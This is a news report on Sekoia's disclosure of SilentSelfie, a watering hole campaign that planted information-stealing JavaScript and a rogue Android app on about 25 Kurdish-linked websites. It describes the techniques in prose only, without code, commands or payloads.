As many as 25 websites linked to the Kurdish minority have been compromised in a watering hole attack that has been active for over a year and a half, targeting sensitive user information.
French cybersecurity firm Sekoia disclosed details of the campaign, dubbed SilentSelfie, noting that the intrusion has been ongoing since at least December 2022. The firm described the attack as a long-running effort, aimed at gathering information from site visitors through multiple variants of an information-stealing framework.
"The simplest of these frameworks only collected the user's location," said security researchers Felix Aimé and Maxime A. "More complex versions, however, used the selfie camera to record images and encouraged selected users to install a malicious APK—a type of Android application."
The targeted websites include Kurdish press outlets, media linked to the Rojava administration, Kurdish armed forces, and revolutionary far-left political groups based in Türkiye and Kurdish regions. Sekoia informed The Hacker News that the method used to compromise these websites remains uncertain.
A New Threat Cluster?
The attack has not been attributed to any known group or threat actor, suggesting the potential emergence of a new cluster specifically targeting the Kurdish community. Historically, groups like StrongPity and BladeHawk have carried out attacks against Kurdish entities, but this new campaign adds another layer of complexity to the cybersecurity landscape.
Earlier in 2024, Dutch security firm Hunt & Hackett revealed that a Türkiye-nexus threat actor called Sea Turtle had also singled out Kurdish websites in the Netherlands, further amplifying concerns about targeted cyberattacks against the Kurdish community.
The Watering Hole Technique
This particular watering hole attack involves deploying malicious JavaScript on compromised websites. The script collects a wide range of data from site visitors, such as their location, device information (number of CPUs, battery status, browser language), and public IP addresses.
One variant of the reconnaissance script, discovered on Kurdish websites like rojnews[.]news, hawarnews[.]com, and targetplatform[.]net, redirects users to rogue Android APK files. Some variants also use cookies, such as "sessionIdVal," to track users.
According to Sekoia's analysis, the malicious Android APK embeds the targeted website as a WebView while secretly extracting system data, contact lists, location information, and files stored in external memory based on the app’s permissions.
"The code doesn’t persistently stay on the device," noted the researchers, "but it is activated every time the user opens the RojNews application."
Once the app is opened, the LocationHelper service sends the user's location to a malicious server within 10 seconds via HTTP POST requests. From there, the system waits for further instructions, leaving the compromised device vulnerable.
Connections to Recent Events
While it’s unclear who is behind SilentSelfie, Sekoia speculates that it could be connected to the Kurdistan Regional Government of Iraq. This hypothesis is based on the arrest of RojNews journalist Silêman Ehmed by KDP forces in October 2023. Ehmed was sentenced to three years in prison in July 2024.
"Despite the low sophistication of the attack, the scale and duration of the campaign make it noteworthy," the researchers said. "It’s possible that an emerging, less-experienced threat actor is behind these incidents, and they are likely still developing their capabilities."
This SilentSelfie watering hole attack, although not highly sophisticated, has affected a significant number of Kurdish websites and continues to threaten users with information theft and potential malware infections. As the threat landscape evolves, protecting these vulnerable online communities becomes ever more crucial.
